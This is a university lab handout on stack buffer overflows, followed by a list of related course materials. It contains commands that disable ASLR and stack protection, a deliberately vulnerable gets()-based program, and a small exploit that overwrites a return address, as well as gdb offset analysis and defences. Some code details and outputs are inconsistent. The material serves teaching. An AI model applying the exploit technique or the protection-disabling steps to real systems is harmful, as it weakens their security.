Blossom Hands-on exercises for computer forensics and security. Buffer Overflow
|
|
- Steven Lucas
- 5 years ago
- Views:
Transcription
1 Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License. To view a copy of this license, visit Buffer Overflow BLOSSOM Manchester Metropolitan University (Funded by Higher Education Academy) l.han@mmu.ac.uk
2 1. Learning Objectives This lab aims to understand buffer overflow. 2. Preparation 1) Under Linux environment 2) Some files that you will need from /home/user/blossomfiles/bufferoverflow: 'exploit.c' 'lame.c' 3) Some documents that you may need to refer to: 'Virtual-MachineGuide.pdf' Linux-Guide.pdf BLOSSOM-UserGuide.pdf 3. Tasks Setup & Installation Start a virtual machine as you have done with previous exercises (see Virtual Machine Guide) # kvm -cdrom /var/tmp/blossomfiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:57 -net vde -name node-one Use the following set of commands to set up the C files, as well as to disable any protections against buffer overflows: # gcc -o exploit exploit.c # gcc -o lame lame.c -fno-stack-protector # echo 0 > /proc/sys/kernel/randomize_va_space
3 Task 1 Buffer Overflow 1.1 Buffer overflows are probably one of the most vicious tools available to an attacker. A small honest mistake made by a programmer with SETUID root permissions can mean catastrophe. A buffer overflow is the technique of overwriting machine code with an attackers own code, this occurs when a program takes input from a user in low-level languages without checking its size. It can be used to gain root access. In older languages, such as FORTRAN, C and C++, it's possible to over address arrays. In modern languages like Java, this is not possible. When an array is padded to a function in C, the function has no concept of the bounds; it is the programmer's responsibility to check bounds. For example: #include <stdio.h> //Include the standard input output library void somefunction(char *buf); void somefunction(char *buf){ buf[17] = `a'; //Address memory that isn't in the array. void main(void){ char buf[16]; //Declare an array of 16 chars, same as a string somefunction(buf); //Call somefunction and pass buf to it In the above example, we have assigned element 17 of array buf, but the array only has 16 elements. As the data type is a char (byte), 'a' will be written to whatever is in the adjacent byte following the array.
4 If memory locations are adjacent, then you can overwrite an adjacent variable by over addressing an array. For example: #include <stdio.h> #include <string.h> void main(void){ char buf[4]; //Declare an array of 4 characters char *b; //Declare a pointer to a character b = &buf[4] + 1; //Make b sit at the end of buf *b = 'x'; //Make char b = x printf("b is %c\n", *b); //Print b which should be x strcpy(buf, "hello"); //Copy "hello" into buf, which is longer than buf printf("b is %c\n", *b); //Print b which should be o When this program is compiled and executed, the following output is given: B is b B is o
5 1.2 Programs are given their own virtual memory space by the operating system; this allows multiple programs to run at once, it also means that the program doesn't have to deal with absolute memory addressing. Programs are given enough memory to hold all the instructions and variable space. The stack is a selection of memory shared by all the functions in a program; it uses a LIFO, last in first out format. Data is pushed on to the top of the stack, and pulled from the top. The process of calling a function is as follows: Push any data needed by the function on to the stack Jump to the location of the first instruction of the function Pull any data off the stack Run instructions Return to the given instruction location We know from the previous example that it's possible to address access other variables in the stack. It's also possible to write over the return address, such that it points to a different location. In the following example, program 2 takes user input, program 1 outputs enough random data to fill the buffer of program 2 and then overwrite the return address with 0x4005d1, the address of the function somefunction(). //Program 1 //This program exploits a buffer overflow vulnerability in program2 //address to another function #include <stdio.h> #define ID 0x4005d1 //Address of somefunction() int main(void){ char buf[(24+8)]; //setup an array of 32 chars int i; for(i = 0; i < 24; ++i) buf[i] = 'a'; //Fill array with 25x'a' *(long *) &buf[24] = ID; //Fill remainder of array with ID //cast to long (long = 8bytes) puts(buf); //output the string //Program 2 //Insecure program, should execute somefunction, and then echo input back to user.
6 #include <stdio.h> int i = 0; void somefunction(void); void lame(void); void somefunction(void){ if(i!= 0) printf("i haz been haked\n"); else printf("working as normal\n"); ++i; void lame(void){ char buf[8]; gets(buf); printf("input: %s\n", buf); int main(void){ somefunction(); lame(); When both programs are executed in the terminal as follows: #./program1./program2 The output should be: Working as normal Input: aaaaaaaaaaaaaaaaaaaaaaaa@ I haz been hacked Input: `@ Unauthorised code has been executed, somefunction() has been called twice when it shouldn't have. We should now have a basic understanding of how buffer overflows work. Try executing the files that we downloaded earlier, the program should return a Segmentation Fault. This means that the program is attempting to access memory that the CPU cannot physically address.
7 1.3 The command gdb can be used to disassemble compiled programs into their memory locations and instructions. This is essential if one is two write a program like above that can exploit successfully. Once you have identified an overflow vulnerability, you would need to use the following commands to obtain enough information to write a successful exploit: # gdb -q program2 #Load the program progname into gdb (gdb) disass main Dump of assembler code for function main: 0x cd <+0>: push %rbp 0x ce <+1>: mov %rsp,%rbp 0x d1 <+4>: callq 0x40056c <somefunction> 0x d6 <+9>: callq 0x4005a1 <lame> 0x db <+14>: pop %rbp 0x dc <+15>: retq End of assembler dump.... #Disassemble the function main, function 'lame' is called at instruction 0x4005d6 (gdb) disass lame Dump of assembler code for function lame: 0x a1 <+0>: push %rbp 0x a2 <+1>: mov %rsp,%rbp 0x a5 <+4>: sub $0x10,%rsp 0x a9 <+8>: lea - 0x10(%rbp),%rax 0x ad <+12>: mov %rax,%rdi 0x b0 <+15>: callq 0x <gets@plt> 0x b5 <+20>: lea - 0x10(%rbp),%rax 0x b9 <+24>: mov %rax,%rsi 0x bc <+27>: mov $0x4006b3,%edi 0x c1 <+32>: mov $0x0,%eax 0x c6 <+37>: callq 0x <printf@plt> 0x cb <+42>: leaveq 0x cc <+43>: retq End of assembler dump.... #Disassemble function lame, total reserver stack size for variables is 0x bytes #8 bytes padding are always included #From line <+4> #So overflow occurs at anything over 24 bytes
8 With this information, it's possible to write exploits for simple programs. Writing advanced exploits goes far beyond the scope of this document. Now that we also understand how to disassemble code and analyse the stack, let's try to actually perform a buffer overflow. Disassemble the program 'lame' using gdb and take a look at the stack. Using the knowledge gained so far from this lab, find the instruction address of a callq to a function, and then modify the file 'exploit.c' accordingly. NOTE: Stack locations can differ between students We should have a similar result to that of the example earlier. 1.4 There are many ways in which buffer overflows can be defended against, such as: Data Execution Protection Many modern processors include a feature that forbids data to be executed as code. In more complex examples, the processor would detect that data would be trying to execute, halting the process. Operating System Both Windows and Linux feature software that implements Data Execution Prevention. Sanitising Code The safest way to avoid buffer overflow exploits is to remove the possibility of over-addressing data in the first place. It was identified a long time ago that gets was unsafe. Since then, newer and safer functions have been developed such as fgets. The prototype for fgets is: char *fgets(char *s, int size, FILE *stream) For example, to copy an amount of data equal to that of the size of buf into buf, from stdin: fgets(buf, sizeof(buf), stdin); This is a safe replacement for gets Try sanitise the file 'lame.c' that was downloaded initially by using fgets instead of gets, and then recompile the code and execute it, noting the difference in result.
9 Summary Questions: 1. In your own words, explain: Buffers Buffer Overflows 2. Name a language other than Java that protects against buffer overflows 3. In your own words, using your own research, give a famous example of a buffer overflow exploit. Include technical details 4. Why is the function gets unsafe?
Linux Capabilities & Set-UID Vulnerability
Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative
More informationBuffer overflows (a security interlude) Address space layout the stack discipline + C's lack of bounds-checking HUGE PROBLEM
Buffer overflows (a security interlude) Address space layout the stack discipline + C's lack of bounds-checking HUGE PROBLEM x86-64 Linux Memory Layout 0x00007fffffffffff not drawn to scale Stack... Caller
More informationCS356: Discussion #7 Buffer Overflows. Marco Paolieri
CS356: Discussion #7 Buffer Overflows Marco Paolieri (paolieri@usc.edu) Array Bounds class Bounds { public static void main(string[] args) { int[] x = new int[10]; for (int i = 0; i
More informationBuffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University
Buffer Overflow Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu x86-64/linux Memory Layout Stack Runtime stack (8MB limit) Heap Dynamically allocated
More informationBuffer Overflow. Jinkyu Jeong Computer Systems Laboratory Sungkyunkwan University
Buffer Overflow Jinkyu Jeong (jinkyu@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu SSE2030: Introduction to Computer Systems, Spring 2018, Jinkyu Jeong (jinkyu@skku.edu)
More informationCS356: Discussion #8 Buffer-Overflow Attacks. Marco Paolieri
CS356: Discussion #8 Buffer-Overflow Attacks Marco Paolieri (paolieri@usc.edu) Previous Example #include void unreachable() { printf("impossible.\n"); void hello() { char buffer[6]; scanf("%s",
More informationBuffer-Overflow Attacks on the Stack
Computer Systems Buffer-Overflow Attacks on the Stack Introduction A buffer overflow occurs when a program, while writing data to a buffer, overruns the buffer's boundary and overwrites memory in adjacent
More informationBuffer overflows. Specific topics:
Buffer overflows Buffer overflows are possible because C does not check array boundaries Buffer overflows are dangerous because buffers for user input are often stored on the stack Specific topics: Address
More informationMachine-Level Programming V: Buffer overflow
Carnegie Mellon Machine-Level Programming V: Buffer overflow Slides adapted from Bryant and O Hallaron Bryant and O Hallaron, Computer Systems: A Programmer s Perspective, Third Edition 1 Recall: Memory
More informationBuffer-Overflow Attacks on the Stack
Computer Systems Buffer-Overflow Attacks on the Stack Introduction A buffer overflow occurs when a program, while writing data to a buffer, overruns the buffer's boundary and overwrites memory in adjacent
More informationCSC 252: Computer Organization Spring 2018: Lecture 9
CSC 252: Computer Organization Spring 2018: Lecture 9 Instructor: Yuhao Zhu Department of Computer Science University of Rochester Action Items: Assignment 2 is due tomorrow, midnight Assignment 3 is out
More informationBuffer Overflows. Buffer Overflow. Many of the following slides are based on those from
s Many of the following slides are based on those from 1 Complete Powerpoint Lecture Notes for Computer Systems: A Programmer's Perspective (CS:APP) Randal E. Bryant and David R. O'Hallaron http://csapp.cs.cmu.edu/public/lectures.html
More informationMachine-Level Programming V: Advanced Topics
Machine-Level Programming V: Advanced Topics CSE 238/2038/2138: Systems Programming Instructor: Fatma CORUT ERGİN Slides adapted from Bryant & O Hallaron s slides 1 Today Memory Layout Buffer Overflow
More informationLinux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics.
Lecture 6B Machine-Level Programming V: Miscellaneous Topics Topics Linux Memory Layout Understanding Pointers Buffer Overflow Upper 2 hex digits of address Red Hat v. 6.2 ~1920MB memory limit FF C0 Used
More informationIntroduction to Computer Systems , fall th Lecture, Sep. 28 th
Introduction to Computer Systems 15 213, fall 2009 9 th Lecture, Sep. 28 th Instructors: Majd Sakr and Khaled Harras Last Time: Structures struct rec { int i; int a[3]; int *p; }; Memory Layout i a p 0
More informationCS-220 Spring 2018 Test 2 Version Practice Apr. 23, Name:
CS-220 Spring 2018 Test 2 Version Practice Apr. 23, 2018 Name: 1. (10 points) For the following, Check T if the statement is true, the F if the statement is false. (a) T F : The main difference between
More informationBuffer Overflow. An Introduction
Buffer Overflow An Introduction Workshop Flow-1 Revision (4-10) How a program runs Registers Memory Layout of a Process Layout of a StackFrame Layout of stack frame using GDB and looking at Assembly code
More informationBuffer Overflows. CSE 410 Winter Kathryn Chan, Kevin Bi, Ryan Wong, Waylon Huang, Xinyu Sui
Buffer Overflows CSE 410 Winter 2017 Instructor: Justin Hsia Teaching Assistants: Kathryn Chan, Kevin Bi, Ryan Wong, Waylon Huang, Xinyu Sui Administrivia Lab 2 & mid quarter survey due tonight Lab 3 released
More informationLab 2: Buffer Overflows
Department of Computer Science: Cyber Security Practice Lab 2: Buffer Overflows Introduction In this lab, you will learn how buffer overflows and other memory vulnerabilities are used to takeover vulnerable
More informationLab 7 Linux Debugging. EECS 448: Software Engineering I Mark Calnon October 17, 2011
Lab 7 Linux Debugging EECS 448: Software Engineering I Mark Calnon October 17, 2011 GDB Getting Started To start gdb from the command line, first browse to the directory containing the core dump to debug
More informationBuffer Overflows. CSE 351 Autumn Instructor: Justin Hsia
Buffer Overflows CSE 351 Autumn 2017 Instructor: Justin Hsia Teaching Assistants: Lucas Wotton Michael Zhang Parker DeWilde Ryan Wong Sam Gehman Sam Wolfson Savanna Yee Vinny Palaniappan http://xkcd.com/804/
More informationBuffer Overflow Vulnerability
Buffer Overflow Vulnerability 1 Buffer Overflow Vulnerability Copyright c 2006 2014 Wenliang Du, Syracuse University. The development of this document is/was funded by three grants from the US National
More informationBuffer Overflows. CSE 351 Autumn 2018
Buffer Overflows CSE 351 Autumn 2018 Instructor: Teaching Assistants: Justin Hsia Akshat Aggarwal An Wang Andrew Hu Brian Dai Britt Henderson James Shin Kevin Bi Kory Watson Riley Germundson Sophie Tian
More informationDownload the tarball for this session. It will include the following files:
Getting Started 1 Download the tarball for this session. It will include the following files: driver driver.c bomb.h bomb.o 64-bit executable C driver source declaration for "bomb" 64-bit object code for
More informationBuffer Overflows Defending against arbitrary code insertion and execution
www.harmonysecurity.com info@harmonysecurity.com Buffer Overflows Defending against arbitrary code insertion and execution By Stephen Fewer Contents 1 Introduction 2 1.1 Where does the problem lie? 2 1.1.1
More informationDownload the tarball for this session. It will include the following files:
Getting Started 1 Download the tarball for this session. It will include the following files: driver driver.c bomb.h bomb.o 64-bit executable C driver source declaration for "bomb" 64-bit object code for
More informationCarnegie Mellon. Answer: 3
Answer: 3 Answer: 2 void fill(char *dest, char *src, int a) { if (a!= 0xdeadbeef) { fill (dest,src,0xdeadbeef); return; } strcpy(dest,src); } void getbuf(void) { int buf[2]; //way too small fill((char*)(&buf[0]),"complexes",0x15213);
More informationBuffer Overflow Attack (AskCypert CLaaS)
Buffer Overflow Attack (AskCypert CLaaS) ---------------------- BufferOverflow.c code 1. int main(int arg c, char** argv) 2. { 3. char name[64]; 4. printf( Addr;%p\n, name); 5. strcpy(name, argv[1]); 6.
More informationCNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux
CNIT 127: Exploit Development Ch 2: Stack Overflows in Linux Stack-based Buffer Overflows Most popular and best understood exploitation method Aleph One's "Smashing the Stack for Fun and Profit" (1996)
More informationBuffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts
This time We will begin our 1st section: Software Security By investigating Buffer overflows and other memory safety vulnerabilities History Memory layouts Buffer overflow fundamentals Software security
More informationSungkyunkwan University
November, 1988 Internet Worm attacks thousands of Internet hosts. How did it happen? November, 1988 Internet Worm attacks thousands of Internet hosts. How did it happen? July, 1999 Microsoft launches MSN
More informationCompiler Drivers = GCC
Compiler Drivers = GCC When you invoke GCC, it normally does preprocessing, compilation, assembly and linking, as needed, on behalf of the user accepts options and file names as operands % gcc O1 -g -o
More information18-600: Recitation #4 Exploits
18-600: Recitation #4 Exploits 20th September 2016 Agenda More x86-64 assembly Buffer Overflow Attack Return Oriented Programming Attack 3 Recap: x86-64: Register Conventions Arguments passed in registers:
More informationMachine-Level Programming V: Advanced Topics
Machine-Level Programming V: Advanced Topics CENG331 - Computer Organization Instructor: Murat Manguoglu Adapted from slides of the textbook: http://csapp.cs.cmu.edu/ Today Memory Layout Buffer Overflow
More informationGNU/Linux: An Essential Guide for Students Undertaking BLOSSOM
Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative
More informationCSC 405 Computer Security Stack Canaries & ASLR
CSC 405 Computer Security Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer overflow defenses
More informationSecurity Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40
Security Workshop HTS LSE Team EPITA 2018 February 3rd, 2016 1 / 40 Introduction What is this talk about? Presentation of some basic memory corruption bugs Presentation of some simple protections Writing
More informationBuffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to
CPSC 8810 Fall 2018 Lab 1 1 Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through email to lcheng2@clemson.edu Copyright c 2006-2014 Wenliang Du, Syracuse
More informationLecture 08 Control-flow Hijacking Defenses
Lecture 08 Control-flow Hijacking Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides adapted from Miller, Bailey, and Brumley Control Flow Hijack: Always control + computation
More informationBuffer Overflows Many of the following slides are based on those from Complete Powerpoint Lecture Notes for Computer Systems: A Programmer's Perspective (CS:APP) Randal E. Bryant and David R. O'Hallaron
More informationComputer Systems Lecture 9
Computer Systems Lecture 9 CPU Registers in x86 CPU status flags EFLAG: The Flag register holds the CPU status flags The status flags are separate bits in EFLAG where information on important conditions
More informationCSE2421 Systems1 Introduction to Low-Level Programming and Computer Organization
Spring 2013 CSE2421 Systems1 Introduction to Low-Level Programming and Computer Organization Kitty Reeves TWRF 8:00-8:55am 1 Compiler Drivers = GCC When you invoke GCC, it normally does preprocessing,
More informationCSCI 356 Fall 2017 : Practice Exam I DO NOT OPEN EXAM PACKET UNTIL INSTRUCTED TO DO SO YOU MAY FILL IN INFORMATION ON THE FRONT NOW
CSCI 356 Fall 2017 : Practice Exam I DO NOT OPEN EXAM PACKET UNTIL INSTRUCTED TO DO SO YOU MAY FILL IN INFORMATION ON THE FRONT NOW PLEASE TURN OFF ALL ELECTRONIC DEVICES ID#: Name: This exam is closed
More informationCS-220 Spring 2018 Final Exam Version Practice May 10, Name:
CS-220 Spring 2018 Final Exam Version Practice May 10, 2018 Name: 1. (10 points) For the following, Check T if the statement is true, the F if the statement is false. (a) T F : One of the advantages of
More informationBuffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University
Buffer Overflow Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu IA-32/Linux Memory Layout Runtime stack (8MB limit) Heap Dynamically allocated storage
More informationBuffer Overflow. Jo, Heeseung
Buffer Overflow Jo, Heeseung IA-32/Linux Memory Layout Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked
More informationBUFFER OVERFLOW. Jo, Heeseung
BUFFER OVERFLOW Jo, Heeseung IA-32/LINUX MEMORY LAYOUT Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked
More informationCS / ECE , Spring 2010 Exam 1
Andrew login ID: Full Name: Recitation Section: CS 15-213 / ECE 18-243, Spring 2010 Exam 1 Version 1100101 Tuesday, March 2nd, 2010 Instructions: Make sure that your exam is not missing any sheets, then
More informationUnderstanding Software Vulnerabilities: C, Debugging Assembly, and Buffer Overflows
Understanding Software Vulnerabilities: C, Debugging Assembly, and Buffer Overflows License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 14: Software Security Department of Computer Science and Engineering University at Buffalo 1 Software Security Exploiting software vulnerabilities is paramount
More informationOffensive Security My First Buffer Overflow: Tutorial
Offensive Security My First Buffer Overflow: Tutorial César Bernardini University of Trento cesar.bernardini@unitn.it October 12, 2015 2 Cesar Bernardini Postdoctoral Fellow at UNITN PhD Student at INRIA-LORIA
More informationAdvanced Buffer Overflow
Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2016/2017 Department of Electrical and Electronic Engineering
More informationThis time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask
This time We will continue Buffer overflows By looking at Overflow Defenses and other memory safety vulnerabilities Everything you ve always wanted to know about gdb but were too afraid to ask Overflow
More informationBetriebssysteme und Sicherheit Sicherheit. Buffer Overflows
Betriebssysteme und Sicherheit Sicherheit Buffer Overflows Software Vulnerabilities Implementation error Input validation Attacker-supplied input can lead to Corruption Code execution... Even remote exploitation
More informationBuffer Overflow Attacks
CS- Spring Buffer Overflow Attacks Computer Systems..-, CS- Spring Hacking Roots in phone phreaking White Hat vs Gray Hat vs Black Hat Over % of Modern Software Development is Black Hat! Tip the balance:
More informationISA 564, Laboratory I: Buffer Overflows
ISA 564, Laboratory I: Buffer Overflows Lab Submission Instructions To complete the lab, you need to submit the compressed files (either tar or zip) using the GMU Blackboard system. Please make sure that
More informationChapter 7: User Defined Functions and Stack Mechanics
Chapter 7: User Defined Functions and Stack Mechanics Objectives: (a) Demonstrate the ability to analyze simple programs that use library and user defined functions. (b) Describe the organization and contents
More informationCSC 405 Computer Security Shellcode
CSC 405 Computer Security Shellcode Alexandros Kapravelos akaprav@ncsu.edu Attack plan Attack code Vulnerable code xor ebx, ebx xor eax, eax mov ebx,edi mov eax,edx sub eax,0x388 Vulnerable code xor ebx,
More informationWar Industries Presents: An Introduction to Programming for Hackers Part V - Functions. By Lovepump, Visit:
War Industries Presents: An Introduction to Programming for Hackers Part V - Functions By Lovepump, 2004 Visit: www.warindustries.com Goals: At the end of Part IV, you should be able to competently code
More informationBasic Buffer Overflows
Operating Systems Security Basic Buffer Overflows (Stack Smashing) Computer Security & OS lab. Cho, Seong-je ( 조성제 ) Fall, 2018 sjcho at dankook.ac.kr Chapter 10 Buffer Overflow 2 Contents Virtual Memory
More information18-600: Recitation #4 Exploits (Attack Lab)
18-600: Recitation #4 Exploits (Attack Lab) September 19th, 2017 Announcements Some students have triggered the bomb multiple times Use breakpoints for explode_bomb() Attack lab will be released on Sep.
More informationCMPSC 497 Buffer Overflow Vulnerabilities
Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA CMPSC 497 Buffer Overflow
More informationRecitation: Attack Lab
15-213 Recitation: Attack Lab TA 11 Feb 2017 Agenda Reminders Stacks Attack Lab Activities Reminders Bomb lab is due tomorrow (14 Feb, 2017)! But if you wait until the last minute, it only takes a minute!
More informationLanguage Security. Lecture 40
Language Security Lecture 40 (from notes by G. Necula) Prof. Hilfinger CS 164 Lecture 40 1 Lecture Outline Beyond compilers Looking at other issues in programming language design and tools C Arrays Exploiting
More informationProgram Security and Vulnerabilities Class 2
Program Security and Vulnerabilities Class 2 CEN-5079: 28.August.2017 1 Secure Programs Programs Operating System Device Drivers Network Software (TCP stack, web servers ) Database Management Systems Integrity
More informationOutline. Format string attack layout. Null pointer dereference
CSci 5271 Introduction to Computer Security Day 5: Low-level defenses and counterattacks Stephen McCamant University of Minnesota, Computer Science & Engineering Null pointer dereference Format string
More informationBuffer Overflow Vulnerability Lab
SEED Labs Buffer Overflow Vulnerability Lab 1 Buffer Overflow Vulnerability Lab Copyright c 2006-2013 Wenliang Du, Syracuse University. The development of this document is/was funded by three grants from
More informationComputer Systems C S Cynthia Lee
Computer Systems C S 1 0 7 Cynthia Lee 2 Today s Topics Function call and return in x86-64 Registers Call stack NEXT TIME: NEW topic: the build process Taking a look at each step of the process Preprocessor,
More informationCPSC 213. Introduction to Computer Systems. Procedures and the Stack. Unit 1e
CPSC 213 Introduction to Computer Systems Unit 1e Procedures and the Stack 1 Readings for Next 3 Lectures Textbook Procedures - 3.7 Out-of-Bounds Memory References and Buffer Overflow - 3.12 2 Local Variables
More informationCSE351 Autumn 2012 Midterm Exam (5 Nov 2012)
CSE351 Autumn 2012 Midterm Exam (5 Nov 2012) Please read through the entire examination first! We designed this exam so that it can be completed in 50 minutes and, hopefully, this estimate will prove to
More informationMachine-level Programs Adv. Topics
Computer Systems Machine-level Programs Adv. Topics Han, Hwansoo x86-64 Linux Memory Layout 0x00007FFFFFFFFFFF Stack Runtime stack (8MB limit) E. g., local variables Heap Dynamically allocated as needed
More informationCSE 361S Intro to Systems Software Lab Assignment #4
Due: Thursday, October 23, 2008. CSE 361S Intro to Systems Software Lab Assignment #4 In this lab, you will mount a buffer overflow attack on your own program. As stated in class, we do not condone using
More informationCSE 351 Midterm - Winter 2015 Solutions
CSE 351 Midterm - Winter 2015 Solutions February 09, 2015 Please read through the entire examination first! We designed this exam so that it can be completed in 50 minutes and, hopefully, this estimate
More informationCS4264 Programming Assignment 1 Buffer Overflow Vulnerability Due 02/21/2018 at 5:00 PM EST Submit through CANVAS
Laboratory for Computer Security Education 1 CS4264 Programming Assignment 1 Buffer Overflow Vulnerability Due 02/21/2018 at 5:00 PM EST Submit through CANVAS Copyright c Wenliang Du, Syracuse University.
More informationGDB Tutorial. Young W. Lim Thr. Young W. Lim GDB Tutorial Thr 1 / 24
GDB Tutorial Young W. Lim 2016-09-29 Thr Young W. Lim GDB Tutorial 2016-09-29 Thr 1 / 24 Outline 1 Introduction Young W. Lim GDB Tutorial 2016-09-29 Thr 2 / 24 Based on "Self-service Linux: Mastering the
More informationlogistics LEX assignment out exam in on week come with questions on Monday (review)
Stack Smashing 1 logistics 2 LEX assignment out exam in on week come with questions on Monday (review) last few times encrypted code changing code polymorphic, metamorphic anti-vm/emulation anti-debugging
More informationProject 1 Notes and Demo
Project 1 Notes and Demo Overview You ll be given the source code for 7 short buggy programs (target[1-7].c). These programs will be installed with setuid root Your job is to write exploits (sploit[1-7].c)
More informationCS356: Discussion #5 Debugging with GDB. Marco Paolieri
CS356: Discussion #5 Debugging with GDB Marco Paolieri (paolieri@usc.edu) Schedule: Exams and Assignments Week 1: Binary Representation HW0. Week 2: Integer Operations Week 3: Floating-Point Operations
More informationBuffer overflow prevention, and other attacks
Buffer prevention, and other attacks Comp Sci 3600 Security Outline 1 2 Two approaches to buffer defense Aim to harden programs to resist attacks in new programs Run time Aim to detect and abort attacks
More information1 Recommended Readings
CSC 482/582 Assignment #5 Buffer Overflow Due: November 14, 2013 The learning objective of this assignment is for students to gain first-hand experience with a buffer overflow vulnerability, applying what
More information20: Exploits and Containment
20: Exploits and Containment Mark Handley Andrea Bittau What is an exploit? Programs contain bugs. These bugs could have security implications (vulnerabilities) An exploit is a tool which exploits a vulnerability
More informationCSC 591 Systems Attacks and Defenses Return-into-libc & ROP
CSC 591 Systems Attacks and Defenses Return-into-libc & ROP Alexandros Kapravelos akaprav@ncsu.edu NOEXEC (W^X) 0xFFFFFF Stack Heap BSS Data 0x000000 Code RW RX Deployment Linux (via PaX patches) OpenBSD
More informationGDB Tutorial. Young W. Lim Tue. Young W. Lim GDB Tutorial Tue 1 / 32
GDB Tutorial Young W. Lim 2017-02-14 Tue Young W. Lim GDB Tutorial 2017-02-14 Tue 1 / 32 Outline 1 Introduction Young W. Lim GDB Tutorial 2017-02-14 Tue 2 / 32 Based on "Self-service Linux: Mastering the
More informationGDB Tutorial. Young W. Lim Fri. Young W. Lim GDB Tutorial Fri 1 / 24
GDB Tutorial Young W. Lim 2016-02-19 Fri Young W. Lim GDB Tutorial 2016-02-19 Fri 1 / 24 Outline 1 Introduction Young W. Lim GDB Tutorial 2016-02-19 Fri 2 / 24 Based on Self-service Linux: Mastering the
More informationMachine-Level Prog. V Miscellaneous Topics
Machine-Level Prog. V Miscellaneous Topics Today Buffer overflow Extending IA32 to 64 bits Next time Memory Fabián E. Bustamante, Spring 2010 Internet worm and IM war November, 1988 Internet Worm attacks
More informationAdvanced Buffer Overflow
Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2017/2018 Department of Electrical and Electronic Engineering
More informationBuffer overflow background
and heap buffer background Comp Sci 3600 Security Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Address Space and heap buffer
More informationBuffer Overflow Defenses
Buffer Overflow Defenses Some examples, pros, and cons of various defenses against buffer overflows. Caveats: 1. Not intended to be a complete list of products that defend against buffer overflows. 2.
More informationMachine- Level Programming V: Advanced Topics
Machine- Level Programming V: Advanced Topics Andrew Case Slides adapted from Jinyang Li, Randy Bryant & Dave O Hallaron 1 Today Structures and Unions Memory Layout Buffer Overflow Vulnerability ProtecEon
More informationOne-Slide Summary. Lecture Outline. Language Security
Language Security Or: bringing a knife to a gun fight #1 One-Slide Summary A language s design principles and features have a strong influence on the security of programs written in that language. C s
More informationComputer Systems CEN591(502) Fall 2011
Computer Systems CEN591(502) Fall 2011 Sandeep K. S. Gupta Arizona State University 9 th lecture Machine-Level Programming (4) (Slides adapted from CSAPP) Announcements Potentially Makeup Classes on Sat
More informationvoid P() {... y = Q(x); print(y); return; } ... int Q(int t) { int v[10];... return v[t]; } Computer Systems: A Programmer s Perspective
void P() { y = Q(x); print(y); return;... int Q(int t) { int v[10]; return v[t]; Computer Systems: A Programmer s Perspective %rax %rbx 0x101 0x41 0x7FFFFA8 0x1 0x7FFFFF8 0xB5A9 0x7FFFFF0 0x789ABC 0x7FFFFE8
More informationCSE 351 Midterm - Winter 2015
CSE 351 Midterm - Winter 2015 February 09, 2015 Please read through the entire examination first! We designed this exam so that it can be completed in 50 minutes and, hopefully, this estimate will prove
More informationSoftware Security: Buffer Overflow Defenses
CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin,
More informationDay14 A. Young W. Lim Tue. Young W. Lim Day14 A Tue 1 / 15
Day14 A Young W. Lim 2017-12-26 Tue Young W. Lim Day14 A 2017-12-26 Tue 1 / 15 Outline 1 Based on 2 C Strings (1) Characters and Strings Unformatted IO Young W. Lim Day14 A 2017-12-26 Tue 2 / 15 Based
More informationIntroduction to software exploitation ISSISP 2017
Introduction to software exploitation ISSISP 2017 1 VM https://drive.google.com/open?id=0b8bzf4ybu s1kltjsnlnwqjhss1e (sha1sum: 36c32a596bbc908729ea9333f3da10918e24d767) Login / pass: issisp / issisp 2
More informationA short session with gdb verifies a few facts; the student has made notes of some observations:
This assignment refers to concepts discussed in the course notes on gdb and the book The Art of Debugging by Matloff & Salzman. The questions are definitely "hands-on" and will require some reading beyond
More informationLinux Memory Layout The course that gives CMU its Zip! Machine-Level Programming IV: Miscellaneous Topics Sept. 24, Text & Stack Example
Machine-Level Programming IV: Miscellaneous Topics Sept. 24, 22 class09.ppt 15-213 The course that gives CMU its Zip! Topics Linux Memory Layout Understanding Pointers Buffer Overflow Floating Point Code
